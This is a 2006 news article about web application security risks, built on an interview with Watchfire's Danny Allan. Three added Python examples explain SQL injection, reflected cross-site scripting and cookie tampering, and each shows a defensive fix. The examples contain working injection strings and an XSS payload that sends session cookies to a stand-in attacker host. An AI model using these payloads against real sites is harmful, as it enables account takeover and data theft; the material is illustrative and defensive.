SINGAPORE--If you think your Web applications are secure, think again.
According to Mass.-based Watchfire, the most vulnerable area in the enterprise information ecosystem is Web applications. The company specializes in software and services to audit the security and regulatory compliance of Web sites.
Danny Allan, Watchfire's director of strategic research, noted that network perimeters bore the brunt of attacks in the past. Now that networks are adequately protected by a range of security tools, Web applications are the easier target, and they are linked to back-end servers and databases holding a wealth of information.
However, businesses are currently not spending enough to protect their Web applications, Allan told ZDNet Asia this week, on the sidelines of the Governmentware 2006 seminar in Singapore. Citing research by Gartner, he pointed out that 90 percent of IT security spending is on network protection and only 10 percent is spent on Web applications.
The same research also revealed that two-thirds of all Web applications are vulnerable, he said. The reason, according to Allan, is that Web applications are not designed correctly and businesses are not aware of the flaw. There is also a tradeoff between making an application user-friendly and making it more secure.
Allan explained: "There are no firewalls or intrusion detection systems [protecting] Web applications. A Web application [for example] doesn't know I'm allowed to save cookie X but not cookie Y.
"In order to secure Web applications, you need to know all the entry points," he said. "No systems administrator knows all the entry points…he didn't build those applications."
The entry points, or attack surface, of a dynamic Web site can number as many as 100 times its page count. By comparison, a static information site may have fewer than 10 entry points per page, he said.
"The sites that you can interact with are the ones that have the most sensitive information," noted Allan. "Any Web site that allows [a user] to contribute content is a potential target." Online forums that do not "sanitize" posted content, for example, are at risk.
Cyber criminals have various ways of delivering their payload. One is tampering with the cookie that identifies a session so that the application believes another person is using it. Another is SQL (Structured Query Language) injection, in which attacker-supplied input is pasted into a database query, so the database executes SQL the attacker wrote and hands back, alters or deletes the data behind the application.
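To make the SQL injection described above concrete, the following is an added example (not code from the article or from Watchfire) with a constructed in-memory SQLite user table: `login_vulnerable` pastes the submitted username and password into the query text, so a payload such as `' OR '1'='1` turns the WHERE clause into one that matches every row, and `admin' --` comments out the password check entirely; `login_parameterized` sends the same input as bound parameters, so the database treats it as data rather than SQL.

```python
import sqlite3

# Constructed sample accounts for the example only.
USERS = [("alice", "s3cret", "user"), ("admin", "hunter2", "admin")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    # The user's input becomes part of the SQL text, so the database
    # executes whatever the attacker typed into the login form.
    query = (
        f"SELECT username, role FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchall()


def login_parameterized(conn, username, password):
    # Placeholders fix the query structure; the input can only ever be
    # compared against the columns, never interpreted as SQL.
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for user, pw in [("' OR '1'='1", "' OR '1'='1"), ("admin' --", "wrong")]:
        print("vulnerable:", login_vulnerable(db, user, pw))
        print("parameterized:", login_parameterized(db, user, pw))
```

With the first payload the vulnerable query returns both accounts without a valid password; with the second it returns the administrator row. The parameterized version returns nothing for either payload and only matches when the real credentials are supplied.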
Another scenario is a phishing e-mail that leads an unsuspecting user to click a URL carrying a hidden malicious script hosted on a staging site. Through that script, attackers can view login details and every keystroke, and can even communicate with the victim in real time via a pop-up window.
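The unsanitized forum post mentioned earlier and the script-carrying phishing URL above are the same flaw seen from two sides: attacker-controlled text is placed into a page and the browser runs it. The following is an added example (not from the article), using a constructed phishing-style URL whose `name` parameter holds a script that steals the session cookie. `render_vulnerable` reflects the parameter as-is; `render_escaped` HTML-escapes it so the browser displays the text instead of executing it. The site and parameter names are invented for the illustration.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed phishing link for the example: the "name" parameter carries a
# script that, if reflected into the page, sends the session cookie to an
# attacker-controlled host.
PHISHING_URL = (
    "https://bank.example/greet?name=%3Cscript%3Edocument.location%3D"
    "%27https%3A%2F%2Fattacker.example%2F%3Fc%3D%27%2Bdocument.cookie"
    "%3C%2Fscript%3E"
)


def name_from_url(url):
    """Extract the (percent-decoded) 'name' query parameter."""
    return parse_qs(urlsplit(url).query)["name"][0]


def render_vulnerable(name):
    # Reflects the parameter verbatim; a <script> tag in it is live HTML.
    return f"<p>Welcome back, {name}</p>"


def render_escaped(name):
    # Escapes <, >, &, and quotes so the browser shows the text literally.
    # The same call is what a forum should apply to user-contributed posts.
    return f"<p>Welcome back, {html.escape(name, quote=True)}</p>"


def contains_script_tag(markup):
    """Crude check used here only to show which rendering is executable."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    payload = name_from_url(PHISHING_URL)
    print(render_vulnerable(payload))
    print(render_escaped(payload))
```

Escaping on output is the minimum; a real site should also apply it per context (attribute, URL, JavaScript) rather than only inside element text.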
For example, the victim may receive a message asking him to key in his credit card number during an online banking session. Once the attacker has the user's credentials, he can alter the cookie to escalate his privileges to those of an administrator, causing even more damage.
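The cookie tampering mentioned twice above, first to pose as another user and here to escalate to administrator, works because the application trusts whatever the browser sends back. The following is an added example (not from the article): `parse_unsigned` models an application that reads `user` and `role` straight from the cookie, so editing the value changes the identity or role; `issue_signed` and `parse_signed` attach an HMAC over the value so any edit is detected and rejected. The secret key and cookie layout are invented for the illustration.

```python
import hashlib
import hmac

# Constructed server-side secret for the example; a real deployment keeps
# this out of source control and rotates it.
SECRET = b"example-server-secret-do-not-reuse"


def parse_unsigned(cookie):
    """Vulnerable: trusts 'user=...; role=...' exactly as the browser sent it."""
    fields = dict(part.strip().split("=", 1) for part in cookie.split(";"))
    return fields["user"], fields["role"]


def _mac(payload):
    return hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()


def issue_signed(user, role):
    """Server issues 'user=..&role=..|<hmac>' so it can recognise its own cookies."""
    payload = f"user={user}&role={role}"
    return f"{payload}|{_mac(payload)}"


def parse_signed(cookie):
    """Hardened: returns (user, role) only if the MAC matches, else None."""
    try:
        payload, mac = cookie.rsplit("|", 1)
    except ValueError:
        return None
    # Constant-time comparison avoids leaking how many bytes matched.
    if not hmac.compare_digest(_mac(payload), mac):
        return None
    fields = dict(kv.split("=", 1) for kv in payload.split("&"))
    return fields["user"], fields["role"]


def tamper(cookie):
    """What the attacker does in the browser: rewrite the role field."""
    return cookie.replace("role=user", "role=admin")


if __name__ == "__main__":
    print(parse_unsigned(tamper("user=alice; role=user")))   # accepted as admin
    signed = issue_signed("alice", "user")
    print(parse_signed(signed))                                # ('alice', 'user')
    print(parse_signed(tamper(signed)))                        # None
```

Signing stops edits, not replay: a stolen but unmodified cookie is still valid until it expires, so the MAC is a complement to, not a substitute for, server-side session state and short lifetimes.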
Having signed certificates is of no help against such attacks, either, Allan pointed out. The SSL (Secure Sockets Layer) system "offers no protection", and attackers would actually prefer to target encrypted sites because those sites mislead users into thinking they are more secure.
The danger does not usually reside at Internet giants such as Google and Yahoo, which have the resources to tackle issues with their Web applications. Rather, it is the banks and other large enterprises that face security risks, noted Allan.
It is not a doomsday scenario though, he said. The good news is that it takes more than the average Joe to be able to steal the data, said Allan. "It's not something that a 12-year-old in the basement would do," he said.
The threat is, however, very real. According to Allan, a Russian blog entry revealed that on average, about 2 percent of 2 million users are tricked into scams that wrongfully obtain their sensitive data or login and password details.